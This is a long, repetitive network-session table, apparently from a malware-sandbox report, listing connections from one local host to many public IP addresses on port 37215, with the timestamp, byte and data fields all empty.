                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4271192.168.2.1349306197.84.155.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4272192.168.2.1349686197.93.55.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4273192.168.2.1346480140.243.144.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4274192.168.2.1348632137.117.42.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4275192.168.2.134185284.70.44.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4276192.168.2.1349798197.36.248.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4277192.168.2.1358948157.211.31.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4278192.168.2.135990041.247.221.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4279192.168.2.1360874157.25.4.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4280192.168.2.1353148197.14.179.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4281192.168.2.1333734157.43.39.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4282192.168.2.1337366197.46.20.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4283192.168.2.134211441.187.138.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4284192.168.2.135644441.196.21.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4285192.168.2.1346930157.39.154.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4286192.168.2.1357888157.38.209.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4287192.168.2.1351750157.83.121.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4288192.168.2.13594601.206.164.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4289192.168.2.1348378157.77.132.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4290192.168.2.135741023.208.119.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4291192.168.2.1345644157.250.60.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4292192.168.2.1338388147.122.154.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4293192.168.2.1345180197.95.5.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4294192.168.2.1333898197.251.81.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4295192.168.2.1350998223.218.135.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4296192.168.2.135713259.57.168.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4297192.168.2.134799041.51.103.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4298192.168.2.1341632157.159.123.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4299192.168.2.1334736197.83.190.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4300192.168.2.1338016147.108.106.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4301192.168.2.135564243.163.186.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4302192.168.2.133722699.107.236.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4303192.168.2.135091441.115.84.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4304192.168.2.1346768126.7.33.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4305192.168.2.1355358157.184.140.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4306192.168.2.134363041.167.108.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4307192.168.2.1344826197.78.240.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4308192.168.2.1355830157.96.11.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4309192.168.2.135582641.73.31.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4310192.168.2.1354502157.120.158.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4311192.168.2.133349841.29.204.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4312192.168.2.1358542197.174.168.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4313192.168.2.1358372157.10.179.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4314192.168.2.1338690210.1.163.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4315192.168.2.1338726157.145.56.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4316192.168.2.1338746122.212.159.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4317192.168.2.135467840.149.82.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4318192.168.2.1359118178.129.225.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4319192.168.2.1337368157.9.117.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4320192.168.2.1338402197.42.196.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4321192.168.2.1341130157.217.158.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4322192.168.2.1348818157.166.160.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4323192.168.2.1334756157.129.170.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4324192.168.2.1340618197.37.131.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4325192.168.2.1355476197.12.241.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4326192.168.2.1335014106.49.116.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4327192.168.2.1334470157.154.84.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4328192.168.2.1356270197.7.228.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4329192.168.2.135471641.154.202.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4330192.168.2.1350004197.57.101.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4331192.168.2.1338124157.185.64.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4332192.168.2.1341260157.40.50.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4333192.168.2.1354286197.182.213.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4334192.168.2.1341786157.123.127.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4335192.168.2.134812241.19.52.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4336192.168.2.1342914197.115.168.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4337192.168.2.134356441.159.33.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4338192.168.2.1357930157.229.121.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4339192.168.2.134942641.200.196.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4340192.168.2.1338432197.247.205.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4341192.168.2.1354964142.192.169.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4342192.168.2.1359348197.155.46.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4343192.168.2.1355656157.225.7.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4344192.168.2.1337690153.210.50.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4345192.168.2.134964241.24.130.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4346192.168.2.135350241.205.147.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4347192.168.2.133507241.22.125.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4348192.168.2.134086241.115.248.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4349192.168.2.134761041.225.170.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4350192.168.2.133361841.64.245.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4351192.168.2.136051689.165.167.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4352192.168.2.1352658157.31.160.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4353192.168.2.1337190197.122.148.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4354192.168.2.1355358157.151.116.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4355192.168.2.135900641.53.146.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4356192.168.2.1347912112.101.226.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4357192.168.2.133525467.228.243.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4358192.168.2.134819041.160.163.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4359192.168.2.1353066185.153.252.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4360192.168.2.1347374157.106.128.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4361192.168.2.1340136197.163.146.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4362192.168.2.1354722157.123.49.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4363192.168.2.1333870197.164.223.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4364192.168.2.1351912197.204.209.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4365192.168.2.1355992197.220.92.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4366192.168.2.1347354157.27.26.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4367192.168.2.1348094157.169.98.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4368192.168.2.1359444157.149.228.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4369192.168.2.1351414157.131.143.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4370192.168.2.1354092157.75.78.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4371192.168.2.134489238.12.230.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4372192.168.2.1333556197.229.145.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4373192.168.2.1334246157.40.200.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4374192.168.2.133754641.187.112.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4375192.168.2.1336464157.86.73.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4376192.168.2.1333440197.155.82.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4377192.168.2.133289045.164.85.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4378192.168.2.135663096.115.199.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4379192.168.2.1353038107.72.184.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4380192.168.2.1353928157.204.240.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4381192.168.2.1334040197.151.13.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4382192.168.2.1340682197.186.104.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4383192.168.2.1348450157.96.41.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4384192.168.2.135596041.45.238.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4385192.168.2.136079443.90.46.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4386192.168.2.1345934121.209.172.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4387192.168.2.1354752197.49.22.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4388192.168.2.134489843.200.59.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4389192.168.2.133322641.0.243.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4390192.168.2.1360144157.133.229.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4391192.168.2.1352262157.236.181.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4392192.168.2.1360264157.187.111.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4393192.168.2.1341408155.8.76.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4394192.168.2.1341002157.0.191.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4395192.168.2.1353134157.207.196.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4396192.168.2.1353670197.228.217.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4397192.168.2.133451641.25.156.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4398192.168.2.135871859.245.31.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4399192.168.2.1352012197.20.146.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4400192.168.2.1339310160.78.116.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4401192.168.2.1338658197.226.211.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4402192.168.2.1339624157.158.21.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4403192.168.2.1342842106.132.148.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4404192.168.2.1348936197.20.38.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4405192.168.2.1343092218.195.68.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4406192.168.2.1339522124.41.97.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4407192.168.2.1358842157.242.189.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4408192.168.2.1346374157.208.79.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4409192.168.2.1343026197.177.193.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4410192.168.2.134966641.117.10.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4411192.168.2.1357296197.16.226.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4412192.168.2.1342982197.129.203.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4413192.168.2.1338512197.249.107.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4414192.168.2.1333646157.69.59.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4415192.168.2.135685624.114.233.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4416192.168.2.1345910159.34.40.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4417192.168.2.1358988157.202.58.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4418192.168.2.1338052197.45.71.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4419192.168.2.135728077.246.233.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4420192.168.2.134455441.240.209.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4421192.168.2.1360616134.229.239.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4422192.168.2.134935041.251.45.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4423192.168.2.1360052157.66.89.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4424192.168.2.1357698197.66.92.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4425192.168.2.1339562187.14.247.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4426192.168.2.135027841.148.39.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4427192.168.2.135722090.13.26.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4428192.168.2.134735041.188.166.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4429192.168.2.134477241.151.206.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4430192.168.2.1335074157.97.252.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4431192.168.2.135663065.86.41.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4432192.168.2.1343618197.59.124.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4433192.168.2.1349840197.241.44.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4434192.168.2.1348428197.33.8.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4435192.168.2.135585441.62.118.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4436192.168.2.1338296157.63.20.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4437192.168.2.134068070.164.171.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4438192.168.2.1357802157.50.32.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4439192.168.2.133817041.215.208.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4440192.168.2.13372225.144.124.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4441192.168.2.134774234.214.40.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4442192.168.2.1352888157.150.31.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4443192.168.2.1336690197.171.131.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4444192.168.2.135654213.74.164.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4445192.168.2.1348352157.58.135.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4446192.168.2.1341230157.170.20.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4447192.168.2.1358670197.238.44.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4448192.168.2.1352570157.196.166.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4449192.168.2.1341294157.144.221.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4450192.168.2.1345672157.11.24.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4451192.168.2.135429832.181.82.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4452192.168.2.134783470.207.105.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4453192.168.2.135878288.161.213.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4454192.168.2.1337330157.239.191.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4455192.168.2.135373092.9.119.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4456192.168.2.1332906211.203.201.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4457192.168.2.1340480178.27.109.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4458192.168.2.1358948157.247.12.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4459192.168.2.1338398157.212.63.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4460192.168.2.1343164157.99.159.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4461192.168.2.134823268.52.235.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4462192.168.2.1355990116.19.186.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4463192.168.2.133827641.66.178.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4464192.168.2.1352222157.197.81.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4465192.168.2.1336860197.77.17.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4466192.168.2.1341730146.94.98.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4467192.168.2.1351632197.247.44.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4468192.168.2.1360904157.225.226.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4469192.168.2.1357316197.130.251.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4470192.168.2.133314042.193.107.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4471192.168.2.1360854157.204.182.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4472192.168.2.1353520197.66.120.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4473192.168.2.135666841.180.104.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4474192.168.2.1341906197.227.0.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4475192.168.2.134973041.45.180.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4476192.168.2.1335564189.72.126.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4477192.168.2.1340326157.39.0.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4478192.168.2.1348960204.242.144.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4479192.168.2.1348446197.22.253.15937215
                                                  TimestampBytes transferredDirectionData


